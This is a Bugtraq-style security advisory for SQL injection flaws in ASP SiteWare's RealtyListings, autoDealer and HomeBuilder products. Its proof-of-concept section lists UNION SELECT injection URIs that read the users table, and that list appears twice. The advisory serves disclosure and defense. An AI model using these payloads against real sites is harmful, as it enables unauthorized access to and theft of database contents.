Multiple ASP SiteWare Products SQL Injection Vulnerabilities
BID:32812
Info
Multiple ASP SiteWare Products SQL Injection Vulnerabilities
| Bugtraq ID: | 32812 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-5772 CVE-2008-5774 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 14 2008 12:00AM |
| Updated: | Jan 06 2009 04:22PM |
| Credit: | AlpHaNiX |
| Vulnerable: |
ASP SiteWare RealtyListings 2 ASP SiteWare RealtyListings 1 ASP SiteWare HomeBuilder 2 ASP SiteWare HomeBuilder 1 ASP SiteWare autoDealer 2 ASP SiteWare autoDealer 1 |
| Not Vulnerable: | |
Discussion
Multiple ASP SiteWare Products SQL Injection Vulnerabilities
Multiple ASP SiteWare products are prone to SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following applications are vulnerable:
RealtyListings 1
RealtyListings 2
AutoDealer 1
AutoDealer 2
HomeBuilder 1
HomeBuilder 2
Multiple ASP SiteWare products are prone to SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following applications are vulnerable:
RealtyListings 1
RealtyListings 2
AutoDealer 1
AutoDealer 2
HomeBuilder 1
HomeBuilder 2
Exploit / POC
Multiple ASP SiteWare Products SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/Realty1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.example.com/Realty1/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.example.com/realty2/realty2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.example.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.example.com/Auto1/type.asp?iType=4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+users#
http://www.example.com/auto2/auto2/type.asp?iType=4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+users#
http://www.example.com/Home1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.example.com/home2/home2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.example.com/home2/home2/type2.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/Realty1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.example.com/Realty1/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.example.com/realty2/realty2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.example.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.example.com/Auto1/type.asp?iType=4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+users#
http://www.example.com/auto2/auto2/type.asp?iType=4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+users#
http://www.example.com/Home1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.example.com/home2/home2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.example.com/home2/home2/type2.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
Solution / Fix
Multiple ASP SiteWare Products SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Multiple ASP SiteWare Products SQL Injection Vulnerabilities
References:
References:
- autoDealer Product Page (ASP SiteWare)
- HomeBuilder Product page (ASP SiteWare)
- RealtyListings Product page (ASP SiteWare)